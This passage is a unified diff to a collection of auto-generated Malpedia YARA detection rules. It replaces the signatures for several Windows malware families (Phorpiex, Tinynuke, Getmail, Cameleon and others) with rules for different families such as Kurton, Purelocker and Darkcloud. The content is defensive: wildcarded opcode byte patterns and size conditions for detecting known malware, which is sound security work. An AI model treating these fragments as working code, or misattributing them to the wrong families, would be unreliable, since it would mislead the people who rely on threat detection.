+		$sequence_1 = { 8d45a4 50 ff7508 8975fc e8???????? }
+		$sequence_2 = { e8???????? 8bf0 85f6 59 743c 8a45e0 832600 }
+		$sequence_3 = { eb54 53 6878020000 8d8580fdffff 50 6a01 ff75f8 }
+		$sequence_4 = { 85c9 7410 3bd1 740c 8b09 85c9 }
+		$sequence_5 = { 740b 8d442410 50 ff15???????? 8bc7 5f 5e }
+		$sequence_6 = { e8???????? 8bf0 f7c67fffffff 7729 ff7508 e8???????? 3bf3 }
+		$sequence_7 = { 8b4c2414 8b463c c644240f01 ff742418 ff742420 ff7644 6a01 }
+		$sequence_8 = { 40 85c9 7c08 668b4b0c 66014b0a 66894308 5f }
+		$sequence_9 = { ff7638 ff742438 50 8d442450 50 ff742438 8d442438 }
 
 	condition:
-		7 of them and filesize < 2031616
+		7 of them and filesize < 557056
 }
-rule MALPEDIA_Win_Phorpiex_Auto : FILE
+rule MALPEDIA_Win_Kurton_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9ce70e39-752b-5d3f-89f2-76accce1eb4a"
+		id = "d9353d3d-fdf8-56bf-b9b4-d5c14e22748b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.phorpiex"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.phorpiex_auto.yar#L1-L274"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kurton"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kurton_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "46ea47179a9ad601c3537e5e9a3e48103f2b8131777a3f05f545f317a9791487"
+		logic_hash = "070c043684321322d3719fa588bcbbaeb820fca4094babc856258c0a6bac0e61"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -84175,54 +84196,34 @@ rule MALPEDIA_Win_Phorpiex_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a00 ff15???????? ff15???????? 50 e8???????? }
-		$sequence_1 = { ff15???????? 85c0 740f 6a07 }
-		$sequence_2 = { ff15???????? 85c0 741f 6880000000 }
-		$sequence_3 = { 6a00 6a20 6a00 6a00 6a00 8b5508 }
-		$sequence_4 = { e8???????? 83c410 6a00 6a02 6a02 6a00 }
-		$sequence_5 = { 6a01 6a00 68???????? e8???????? 83c40c 33c0 }
-		$sequence_6 = { e8???????? 99 b90d000000 f7f9 }
-		$sequence_7 = { 50 e8???????? 83c404 e8???????? e8???????? ff15???????? }
-		$sequence_8 = { 68???????? ff15???????? 8d85f8fdffff 50 68???????? }
-		$sequence_9 = { 6a00 ff15???????? 85c0 7418 ff15???????? }
-		$sequence_10 = { 6a01 ff15???????? ff15???????? b001 }
-		$sequence_11 = { 6a00 682a800000 6a00 ff15???????? }
-		$sequence_12 = { 52 683f000f00 6a00 68???????? 6802000080 ff15???????? 85c0 }
-		$sequence_13 = { 7416 8b4df8 51 ff15???????? 8b55fc 52 e8???????? }
-		$sequence_14 = { f7f9 81c210270000 52 e8???????? }
-		$sequence_15 = { 85c0 752b 8b8510ffffff 83c001 }
-		$sequence_16 = { 6a01 ff15???????? 8945f8 837df800 7429 8b45f8 }
-		$sequence_17 = { 68???????? ff15???????? e9???????? 8d45fc }
-		$sequence_18 = { 50 e8???????? 59 59 85c0 7573 }
-		$sequence_19 = { 3d00010000 7504 83c8ff c3 }
-		$sequence_20 = { 7508 6a00 ff15???????? 6804010000 }
-		$sequence_21 = { 6a21 50 e8???????? c60000 }
-		$sequence_22 = { 52 e8???????? 99 b960ea0000 f7f9 }
-		$sequence_23 = { 56 ff15???????? b001 5e 81c408020000 }
-		$sequence_24 = { 68???????? 8d942410010000 6804010000 52 e8???????? }
-		$sequence_25 = { 40 84c9 75f9 8b0cb3 2bc2 50 }
-		$sequence_26 = { 41 663bc2 72f7 53 33c0 }
-		$sequence_27 = { 56 57 68e8030000 ff15???????? e8???????? be???????? }
-		$sequence_28 = { 50 8d45ec 50 6805000020 }
-		$sequence_29 = { 8d45f8 50 8d45e4 50 6805000020 }
+		$sequence_0 = { 50 57 e8???????? 68???????? e8???????? 83c404 }
+		$sequence_1 = { 52 ff15???????? 8b44241c 3bc3 7407 50 }
+		$sequence_2 = { 57 7355 8bc1 c1f805 8d3c85a05b0210 8bc1 }
+		$sequence_3 = { 8d4c240c 50 51 6a1f 52 }
+		$sequence_4 = { 83e103 f3a4 8d4c240c e8???????? 8d4c2448 }
+		$sequence_5 = { 8bce e8???????? 84c0 0f84d4000000 8bce e8???????? 84c0 }
+		$sequence_6 = { 0f8498feffff bf???????? 83c9ff 33c0 }
+		$sequence_7 = { 33c0 c68414c400000000 8bac24c8020000 f2ae f7d1 }
+		$sequence_8 = { 3ac3 0f84d9000000 3cff 0f84d1000000 fec8 }
+		$sequence_9 = { 57 55 8d5e10 8974241c 8bcb 8803 e8???????? }
 
 	condition:
-		7 of them and filesize < 2490368
+		7 of them and filesize < 344064
 }
-rule MALPEDIA_Win_Tinynuke_Auto : FILE
+rule MALPEDIA_Win_Cloud_Duke_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "26956b4b-2451-5deb-9643-68612b9d6236"
+		id = "e419e016-f5fc-54fd-9e45-72cf3dfc672c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinynuke"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tinynuke_auto.yar#L1-L293"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cloud_duke"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cloud_duke_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "19ead60aa2eb3196f69ad300611cd24757349dd6202d9e3aa3460ca7368338a0"
+		logic_hash = "fda6f38613671be0889a1aab772fc69d0cd906ec00d4774d2302c1e1bbcac11b"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -84234,53 +84235,32 @@ rule MALPEDIA_Win_Tinynuke_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c3 55 8bec 817d0c00040000 }
-		$sequence_1 = { ff15???????? ff35???????? 8b7dfc 57 a3???????? ff15???????? ff35???????? }
-		$sequence_2 = { 5e 85c0 753c 56 8d45f8 }
-		$sequence_3 = { 8945f4 8d85d4feffff 50 ff15???????? }
-		$sequence_4 = { 83c418 a3???????? 5f 5e 5b c9 c3 }
-		$sequence_5 = { 8d8530f6ffff 50 6802020000 ff15???????? }
-		$sequence_6 = { 53 56 57 33c0 33db 6a07 }
-		$sequence_7 = { 6a03 53 53 6800000080 50 ff15???????? a3???????? }
-		$sequence_8 = { ff75ec ff75fc e8???????? 83c40c 5f }
-		$sequence_9 = { 50 ff15???????? ff35???????? 8d85a4feffff 50 ff15???????? }
-		$sequence_10 = { a3???????? 68e2010000 68???????? 68???????? e8???????? }
-		$sequence_11 = { 8b02 8a00 3c0a 7409 3c0d }
-		$sequence_12 = { 6a2a 50 8945fc ff15???????? }
-		$sequence_13 = { ff15???????? a3???????? ff35???????? ff75ec ff15???????? }
-		$sequence_14 = { a3???????? ff35???????? ff75f8 ff15???????? }
-		$sequence_15 = { c70604000000 e8???????? eb18 83f803 7519 }
-		$sequence_16 = { 59 8d85d0fcffff 50 8d85d8feffff 50 ff15???????? ff35???????? }
-		$sequence_17 = { 8d45dc 50 ff15???????? 8d85d0fcffff 50 e8???????? }
-		$sequence_18 = { 8d85d4fdffff 50 ff15???????? ff35???????? 8d85d4fdffff 50 ff15???????? }
-		$sequence_19 = { ff15???????? 8b35???????? 8d430c 50 }
-		$sequence_20 = { e8???????? 8945fc 8b0f 83ec08 85c9 75d6 }
-		$sequence_21 = { c70424???????? e8???????? 83ec08 85c0 75d6 }
-		$sequence_22 = { 85c0 7422 8b0cb2 83ec08 03cf ba???????? }
-		$sequence_23 = { 891c24 89442408 e8???????? 0fb76f06 }
-		$sequence_24 = { c785e4fdffff00000000 c785e0fdffff01000000 f3ab ff15???????? 8d85e8fdffff 6804010000 }
-		$sequence_25 = { e8???????? 83ec08 89c3 c7042400000000 e8???????? }
-		$sequence_26 = { 5b c20800 891c24 e8???????? 83ec04 }
-		$sequence_27 = { 89bdb8fdffff ff15???????? 83bdbcfdffff01 7477 8b85c4fdffff }
-		$sequence_28 = { 83ec0c 31c0 83c43c 5b 5e }
-		$sequence_29 = { 837c243401 7537 c744241400000000 c744241000000000 c744240c00000000 c7442408???????? c744240400000000 }
-		$sequence_30 = { 85c0 75d6 31db 8d742600 c70424???????? }
+		$sequence_0 = { 8b8a88e8ffff 33c8 e8???????? 83c008 8b4af8 33c8 }
+		$sequence_1 = { 89442420 742b 48 89442414 6aff 6a00 57 }
+		$sequence_2 = { e8???????? 51 8bc8 c645fc13 e8???????? 83c404 c645fc11 }
+		$sequence_3 = { 897da4 6a13 6a00 68???????? 8bce e8???????? 83f8ff }
+		$sequence_4 = { 83e4f0 6aff 68???????? 64a100000000 50 81ec2c020000 }
+		$sequence_5 = { 50 c784240c010000ffffffff e8???????? 8b842404010000 f7d0 39442428 0f8599060000 }
+		$sequence_6 = { 75f5 e9???????? 83f805 0f85b8020000 }
+		$sequence_7 = { 8bf0 e8???????? 83c414 39b42418010000 0f8572000000 6a44 }
+		$sequence_8 = { 668906 8945fc 8b4310 8b7e10 83c007 c745f001000000 3bf8 }
+		$sequence_9 = { 0f57c0 0f43842420010000 51 8d8c24a0010000 }
 
 	condition:
-		7 of them and filesize < 1196032
+		7 of them and filesize < 368640
 }
-rule MALPEDIA_Win_Getmail_Auto : FILE
+rule MALPEDIA_Win_Pathloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "dbf6f885-27d8-521e-803a-d4cecec2a1f3"
+		id = "6e986434-599f-5205-bbd3-c4644fef6a44"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.getmail"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.getmail_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pathloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pathloader_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "2b6fbdf48e4c6a7974cdc409a23649369cc0b33f0a3fc425aba3ea953c2d50db"
+		logic_hash = "7556d740969ba30806ff23ef7c71f55747c108deea39b5487e7d46d63a258306"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -84294,32 +84274,32 @@ rule MALPEDIA_Win_Getmail_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 89442428 eb07 8d4c241c 51 }
-		$sequence_1 = { f3a4 8b442410 395840 7463 8b704c 8b7848 a1???????? }
-		$sequence_2 = { e8???????? 83c40c 85c0 752d bf???????? 83c9ff f2ae }
-		$sequence_3 = { 56 e8???????? 83c40c 895c2430 85c0 }
-		$sequence_4 = { 7cf1 56 8bf1 c1e603 3b9618444100 }
-		$sequence_5 = { 895c244c 895c2450 8b84243c020000 8d54247c 52 53 8b08 }
-		$sequence_6 = { 8bfe 8bcb 33c0 f2ae f7d1 49 51 }
-		$sequence_7 = { 8b4d00 68???????? 51 e8???????? 83c408 85c0 }
-		$sequence_8 = { 8b442420 3bc3 741d 8d48ff 8a40ff 84c0 }
-		$sequence_9 = { 8d542418 89442408 8b442410 56 52 8b08 }
+		$sequence_0 = { 7742 498bc8 e8???????? 4c897710 48c747180f000000 }
+		$sequence_1 = { 41ffd0 498986d8000000 488d55c8 48837de008 480f4355c8 4533c9 450fb786a0000000 }
+		$sequence_2 = { 7524 488d0d5e940200 e8???????? 85c0 7510 488d0d66940200 e8???????? }
+		$sequence_3 = { 488d15ea240100 e8???????? 8bcb 4885c0 740c }
+		$sequence_4 = { 0fb705???????? 6689442460 0fb605???????? 88442462 448bc1 4183ff02 }
+		$sequence_5 = { 4c63d2 488bd9 498bc2 458bf1 48c1f806 488d0dc0a20100 }
+		$sequence_6 = { 57 4883ec20 e8???????? 488b05???????? 488d1d2ffe0100 4885c0 480f45d8 }
+		$sequence_7 = { 488bfa 488bd9 49894ba8 498953b0 4533f6 45897398 }
+		$sequence_8 = { 410fb641ff 440f47c2 4533c2 4569d093010001 84c0 75d7 4181fad26d58ad }
+		$sequence_9 = { e8???????? 84c0 0f8422ffffff 44383d???????? f20f1005???????? 0fb705???????? }
 
 	condition:
-		7 of them and filesize < 188416
+		7 of them and filesize < 464896
 }
-rule MALPEDIA_Win_Cameleon_Auto : FILE
+rule MALPEDIA_Win_Purelocker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6ba1f947-7c11-5a6f-94b1-6f9ed842ec2b"
+		id = "19f36305-4b96-510d-a7f2-0dc1a52c7e21"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cameleon_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.purelocker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.purelocker_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "5126d39a589ca456705b9580398901c26a625f6b65ede04aeb5951f2fdaf02c8"
+		logic_hash = "938c4b6e5f7cc834fc68e23dd33e35b757eeea1e164b3c0af40b39e69fc933d6"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -84333,34 +84313,34 @@ rule MALPEDIA_Win_Cameleon_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b7de0 85f6 0f8567ffffff 83ff20 0f83a8000000 83c8ff 2bc7 }
-		$sequence_1 = { 3975d4 7347 52 56 8d4dc0 }
-		$sequence_2 = { c3 e8???????? 85c0 0f843aa70000 c3 833d????????ff 7503 }
-		$sequence_3 = { c745ecd88e0210 894df8 8945fc 64a100000000 8945e8 }
-		$sequence_4 = { 83f924 7d10 8a80f8c70410 8807 47 }
-		$sequence_5 = { 8b45b8 8b11 03c6 50 56 8d450c 50 }
-		$sequence_6 = { 253bffffff 33f6 3bc8 740c 8b0cb584bf0410 46 85c9 }
-		$sequence_7 = { 7405 e8???????? a900000080 751f d9fa 833d????????00 0f85037f0000 }
-		$sequence_8 = { 2bc1 83f808 0f86bc000000 8d7108 83fefe }
-		$sequence_9 = { e8???????? 8d8d04ffffff e8???????? 8d4d8c e8???????? 8d4da4 }
+		$sequence_0 = { 8f84240c040000 ffb42410040000 58 89842420040000 8b9c2414040000 3b9c240c040000 0f8da5000000 }
+		$sequence_1 = { 50 5b 5f 83ffff 7f0b 7c05 83fbff }
+		$sequence_2 = { e8???????? ffb42458080000 e8???????? 31c0 0fbec0 }
+		$sequence_3 = { 7505 e9???????? 8b9c2450040000 83fb01 0f85c3000000 83bc245804000000 7411 }
+		$sequence_4 = { 89442404 ff3424 8d1524400110 59 e8???????? 7415 }
+		$sequence_5 = { 750e 837c240400 7407 b801000000 eb02 31c0 21c0 }
+		$sequence_6 = { 7c11 8b5c2420 3b5c2428 7f07 b801000000 eb02 }
+		$sequence_7 = { e9???????? 6819000000 68ffffffff ff742414 ff742420 e8???????? ff742410 }
+		$sequence_8 = { 52 e8???????? 5a 50 ff742408 e8???????? 8d44241c }
+		$sequence_9 = { ffb424bc000000 e8???????? 0fbe842488000000 0fbec0 e9???????? ff742474 }
 
 	condition:
-		7 of them and filesize < 824320
+		7 of them and filesize < 193536
 }
-rule MALPEDIA_Win_Startpage_Auto : FILE
+rule MALPEDIA_Win_Nagini_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5a6b784b-ec8f-5962-9d64-894cc5561282"
+		id = "96b62be7-f485-5281-9063-fa2aa017f19b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.startpage"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.startpage_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nagini"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nagini_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "21d756dfb49cd7d91a800b8f6049ef1f88714f6007f6f320c1aa4c2e5532acfc"
+		logic_hash = "7611b927095df92b3b5eaffee00806b1be3b736d512ae6422738ca1d97180738"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -84372,32 +84352,32 @@ rule MALPEDIA_Win_Startpage_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6801000080 ff15???????? 8b4dd8 8bf0 83c1f0 e8???????? 85f6 }
-		$sequence_1 = { 8b4f18 84040a eb57 8b471c 85c0 741b 8b4808 }
-		$sequence_2 = { 663bc3 75f6 2b8de4deffff d1f9 41 8d344e 8d144a }
-		$sequence_3 = { 1bc0 2516020780 e9???????? 56 8b36 e8???????? 59 }
-		$sequence_4 = { 50 8d4e0c e8???????? 33c0 894610 894614 894618 }
-		$sequence_5 = { 8d7010 89b5e0feffff 8d85e0feffff c645fc0d 50 8d4b1c e8???????? }
-		$sequence_6 = { 85c0 51 0f45d8 c645fc05 53 8d4db8 e8???????? }
-		$sequence_7 = { ff15???????? 6a01 ff758c ff15???????? 8b4588 6a15 8b484c }
-		$sequence_8 = { 7417 56 8b30 50 e8???????? 8bc6 59 }
-		$sequence_9 = { 5b 8be5 5d c3 ff15???????? 0fb7c8 81c900000780 }
+		$sequence_0 = { 080c08 07 0d0807110c 0916 100b }
+		$sequence_1 = { 83781408 7202 8b00 50 e8???????? 83c404 837c245808 }
+		$sequence_2 = { 0f835ffbffff 03f3 03d3 83fb1f 0f8715040000 ff249da0c64000 8b46e4 }
+		$sequence_3 = { 0404 0406 0404 06 0404 06 0404 }
+		$sequence_4 = { 0536240538 27 06 37 260537260535 230434 2203 }
+		$sequence_5 = { 07 0505080606 0907 07 }
+		$sequence_6 = { 6a14 8d0440 3d860a0000 756c 6a32 68a0000000 }
+		$sequence_7 = { 6454 48 68584c6959 4d 6f 5f 53 }
+		$sequence_8 = { 06 0806 06 0907 }
+		$sequence_9 = { 89441928 8b45f0 8954192c 8b4df4 8b148dc0914200 }
 
 	condition:
-		7 of them and filesize < 2277376
+		7 of them and filesize < 12820480
 }
-rule MALPEDIA_Win_Whiskerspy_Auto : FILE
+rule MALPEDIA_Win_Punkey_Pos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "129d540e-8d5c-5460-9975-895a38c68929"
+		id = "558f1792-1bb2-5d9b-859d-0b6382b27ab5"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.whiskerspy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.whiskerspy_auto.yar#L1-L147"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.punkey_pos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.punkey_pos_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "f82e28f98658c3c783c2c1731be6b16001447d83e33b49e0aaa68c9ddf787261"
+		logic_hash = "a4ee7826b83e8d1ab2e9aee9c2a1f21a3ae3a3b9d6fb52555b83791b8ed2dd78"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -84411,39 +84391,34 @@ rule MALPEDIA_Win_Whiskerspy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b06 8bcf d3e8 a801 }
-		$sequence_1 = { 33d2 488d4c2460 41b804010000 e8???????? 33d2 }
-		$sequence_2 = { 418b37 488bfd 488b8c2420010000 4883c510 }
-		$sequence_3 = { 44896ddc 498bd4 498bcd e8???????? 4c8be0 }
-		$sequence_4 = { 4803ca 418bc3 4c3bc1 458b4210 8b0d???????? }
-		$sequence_5 = { 48d3cf 4933f8 4b87bcfee0740200 33c0 488b5c2450 }
-		$sequence_6 = { e8???????? c6043700 488d55e0 498bce e8???????? }
-		$sequence_7 = { 4157 488dac24c8fcffff 4881ec38040000 488bda }
-		$sequence_8 = { 8d45d4 837de808 8b4db0 0f4345d4 8b16 }
-		$sequence_9 = { c685f9fbffff1e c685fafbffff8b 59 c685fbfbffff86 }
-		$sequence_10 = { c685e4feffff7b 889de5feffff 8a85b8feffff 8a840db8feffff }
-		$sequence_11 = { 6a06 59 f3a5 8b75e8 8b7dd8 }
-		$sequence_12 = { 0fbec1 83e820 83e07f 8b0cc5d43b4300 eb02 }
-		$sequence_13 = { 7430 8b5304 8d47f8 8d7308 }
-		$sequence_14 = { 33c0 f68594f9ffff02 899d9cf8ffff 89b5a0f8ffff }
+		$sequence_0 = { ff05???????? 8b0d???????? 56 57 6a00 51 ff15???????? }
+		$sequence_1 = { 56 ffd7 a3???????? 85c0 74ae 5f b801000000 }
+		$sequence_2 = { 68e7070000 50 ff15???????? ff05???????? }
+		$sequence_3 = { 741d a1???????? 85c0 740e 56 57 68e7070000 }
+		$sequence_4 = { ffd7 a3???????? 85c0 74ae 5f b801000000 }
+		$sequence_5 = { 50 a1???????? 50 ff15???????? 5d c20c00 }
+		$sequence_6 = { 85c0 7919 8b4d10 8b550c }
+		$sequence_7 = { a3???????? 85c0 74ae 5f b801000000 }
+		$sequence_8 = { ff15???????? c705????????00000000 c3 3b0d???????? 7502 f3c3 e9???????? }
+		$sequence_9 = { 56 57 68e7070000 50 ff15???????? ff05???????? }
 
 	condition:
-		7 of them and filesize < 591872
+		7 of them and filesize < 499712
 }
-rule MALPEDIA_Win_Computrace_Auto : FILE
+rule MALPEDIA_Win_Silence_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d022645b-4eeb-5507-b4bf-b64f930ec84b"
+		id = "76b63199-cbb5-5cad-8141-09f38a80148d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.computrace"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.computrace_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.silence"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.silence_auto.yar#L1-L414"
 		license_url = "N/A"
-		logic_hash = "f20f4a4bfb7063221bca96073a60966b690b58a18a5add0eb3048df505777fc6"
+		logic_hash = "ca0b6959891210b6329cb5e65869406530d9a0a78093846319a985c972eb2ee3"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -84455,34 +84430,72 @@ rule MALPEDIA_Win_Computrace_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4628 8d5508 6a04 52 56 ffd0 }
-		$sequence_1 = { 7469 c7466c01000000 834e70ff 804e5c04 ff15???????? }
-		$sequence_2 = { 2bc7 7417 48 740f 48 }
-		$sequence_3 = { 8d442404 50 6a01 6a00 6a03 ff15???????? c20400 }
-		$sequence_4 = { 894c862c 8935???????? 5e 8bc3 5b }
-		$sequence_5 = { 3b0f 7cd3 c60600 2b750c 8937 5f 5e }
-		$sequence_6 = { 8845f3 33ff 397d14 7e1a }
-		$sequence_7 = { 56 8b35???????? 57 8b7d08 8d85f8feffff 50 }
-		$sequence_8 = { 7305 6681f22110 fecd 75f2 }
-		$sequence_9 = { ffb6401b0000 ff15???????? 8d86301b0000 50 8d45e4 50 }
+		$sequence_0 = { e8???????? cc 8325????????00 c3 6a08 }
+		$sequence_1 = { 8a4801 40 84c9 75f4 eb05 }
+		$sequence_2 = { 50 6a00 6a00 68???????? c745fc00000000 }
+		$sequence_3 = { 50 683f020f00 6a00 68???????? 6801000080 ff15???????? 68???????? }
+		$sequence_4 = { 6801000080 ff15???????? 56 8d85f8feffff 50 }
+		$sequence_5 = { ff15???????? 6a00 6800000004 6a00 }
+		$sequence_6 = { 7502 f3c3 e9???????? e8???????? e9???????? 6a14 68???????? }
+		$sequence_7 = { 68???????? ffd6 8b45fc 85c0 }
+		$sequence_8 = { 6800040000 ff30 c745fc00000000 57 ff15???????? }
+		$sequence_9 = { 55 8bec 51 56 8b35???????? 6a00 6a00 }
+		$sequence_10 = { 8b35???????? 6a00 6a00 6a00 6a00 8d45fc }
+		$sequence_11 = { 84c9 75f4 eb0d 803800 7408 8a5a01 42 }
+		$sequence_12 = { 3acb 740a 8a4801 40 }
+		$sequence_13 = { 5b 5d c3 c60200 42 }
+		$sequence_14 = { 8bf8 6a00 57 ff15???????? 8d45fc }
+		$sequence_15 = { 50 56 ff15???????? 8b85b8f7ffff 85c0 75b6 ffb5acf7ffff }
+		$sequence_16 = { 8d85b8f7ffff 50 6800080000 8d85bcf7ffff 50 }
+		$sequence_17 = { 6a00 8d8db4f7ffff 51 50 8d85bcf7ffff }
+		$sequence_18 = { e8???????? ff76f8 e8???????? 83c41c 895ef8 897ef0 5b }
+		$sequence_19 = { 8b46f8 0346f4 57 ff7508 50 }
+		$sequence_20 = { 8b01 52 8d95f0fdffff 52 }
+		$sequence_21 = { e8???????? ff37 8b35???????? ffd6 }
+		$sequence_22 = { 898df8fbffff 8d8dfcfbffff 51 ffb5f0fbffff }
+		$sequence_23 = { ff5210 8b17 8bcf ff5208 }
+		$sequence_24 = { 52 ff10 8b95ecfdffff 03fa }
+		$sequence_25 = { e8???????? 8b4ef4 8bc7 2bc1 }
+		$sequence_26 = { 99 83e203 03c2 c1f802 89442448 }
+		$sequence_27 = { ff15???????? ba180c0000 b940000000 ff15???????? }
+		$sequence_28 = { 8b05???????? d3e0 8b0d???????? 03c8 }
+		$sequence_29 = { d3e0 0fb6c8 8b05???????? d3e0 }
+		$sequence_30 = { e8???????? ba00040000 b940000000 ff15???????? }
+		$sequence_31 = { ff15???????? 41b804010000 488d542430 488d4c2430 ff15???????? 85c0 }
+		$sequence_32 = { d3f8 0fb60d???????? d3e0 85c0 }
+		$sequence_33 = { ff15???????? 488d542430 488d8c2440020000 ff15???????? }
+		$sequence_34 = { 8d0441 33d2 b905000000 f7f1 }
+		$sequence_35 = { 750e 68???????? ff15???????? c20800 53 8b1d???????? }
+		$sequence_36 = { 8bec ff4d08 755d 833d????????04 }
+		$sequence_37 = { c705????????00000000 c705????????04000000 ff15???????? 85c0 750b }
+		$sequence_38 = { 7507 68???????? ffd7 6a00 6a00 6a01 }
+		$sequence_39 = { 53 8b1d???????? 57 0f57c0 }
+		$sequence_40 = { 68???????? ff15???????? a3???????? 85c0 750e 68???????? ff15???????? }
+		$sequence_41 = { ff15???????? 68c0d40100 ff15???????? e9???????? }
+		$sequence_42 = { ffd3 5e 85c0 7507 68???????? ffd7 5f }
+		$sequence_43 = { c705????????00000000 c705????????00000000 ffd3 8b3d???????? }
+		$sequence_44 = { 0305???????? 0b45f0 3305???????? a3???????? }
+		$sequence_45 = { 03048db0354200 eb05 b8???????? f6402820 }
+		$sequence_46 = { 03048db0354200 eb02 8bc6 80782900 }
+		$sequence_47 = { 03048db0354200 50 ff15???????? 5d }
 
 	condition:
-		7 of them and filesize < 73728
+		7 of them and filesize < 70128640
 }
-rule MALPEDIA_Win_Hookinjex_Auto : FILE
+rule MALPEDIA_Win_Darkcloud_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e24b7d8d-57d5-5a71-8e95-7d0e69957252"
+		id = "cd1b5f5a-7942-5b60-9ccf-fe3c4e2edece"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hookinjex"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hookinjex_auto.yar#L1-L153"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcloud"
